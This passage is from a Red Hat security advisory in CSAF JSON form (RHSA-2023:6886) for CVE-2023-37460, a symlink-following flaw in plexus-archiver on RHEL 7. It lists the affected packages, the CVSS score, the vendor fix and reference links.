{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7ComputeNode-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7ComputeNode-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7ComputeNode-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Server-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7Server-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Server-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Workstation-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7Workstation-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Workstation-optional-7.9.Z"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-37460",
"cwe": {
"id": "CWE-61",
"name": "UNIX Symbolic Link (Symlink) Following"
},
"discovery_date": "2023-10-05T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2242288"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-37460"
},
{
"category": "external",
"summary": "RHBZ#2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37460"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460"
},
{
"category": "external",
"summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"category": "external",
"summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/",
"url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/"
}
],
"release_date": "2023-07-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-11-13T09:42:49+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:6886"
},
{
"category": "workaround",
"details": "No mitigations are available for this issue.",
"product_ids": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver"
}
]
}
rhsa-2023_6886
Vulnerability from csaf_redhat
Published
2023-11-13 09:42
Modified
2024-12-17 23:06
Summary
Red Hat Security Advisory: plexus-archiver security update
Notes
Topic
An update for plexus-archiver is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
The Plexus project provides a full software stack for creating and executing software projects. Based on the Plexus container, the applications can utilise component-oriented programming to build modular, reusable components that can easily be assembled and reused. The plexus-archiver component provides functions to create and extract archives.
Security Fix(es):
* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for plexus-archiver is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The Plexus project provides a full software stack for creating and executing software projects. Based on the Plexus container, the applications can utilise component-oriented programming to build modular, reusable components that can easily be assembled and reused. The plexus-archiver component provides functions to create and extract archives.\n\nSecurity Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2023:6886",
"url": "https://access.redhat.com/errata/RHSA-2023:6886"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6886.json"
}
],
"title": "Red Hat Security Advisory: plexus-archiver security update",
"tracking": {
"current_release_date": "2024-12-17T23:06:24+00:00",
"generator": {
"date": "2024-12-17T23:06:24+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2023:6886",
"initial_release_date": "2023-11-13T09:42:49+00:00",
"revision_history": [
{
"date": "2023-11-13T09:42:49+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2023-11-13T09:42:49+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-17T23:06:24+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Client Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::client"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::computenode"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Server Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::server"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::workstation"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "plexus-archiver-0:2.4.2-6.el7_9.src",
"product": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src",
"product_id": "plexus-archiver-0:2.4.2-6.el7_9.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"product": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"product_id": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"product": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"product_id": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/plexus-archiver-javadoc@2.4.2-6.el7_9?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Client-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7Client-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Client-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7ComputeNode-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7ComputeNode-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7ComputeNode-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Server-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7Server-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Server-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Workstation-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7Workstation-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Workstation-optional-7.9.Z"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-37460",
"cwe": {
"id": "CWE-61",
"name": "UNIX Symbolic Link (Symlink) Following"
},
"discovery_date": "2023-10-05T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2242288"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-37460"
},
{
"category": "external",
"summary": "RHBZ#2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37460"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460"
},
{
"category": "external",
"summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"category": "external",
"summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/",
"url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/"
}
],
"release_date": "2023-07-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-11-13T09:42:49+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:6886"
},
{
"category": "workaround",
"details": "No mitigations are available for this issue.",
"product_ids": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Server-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Server-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Workstation-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Workstation-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch",
"7ComputeNode-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src",
"7ComputeNode-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
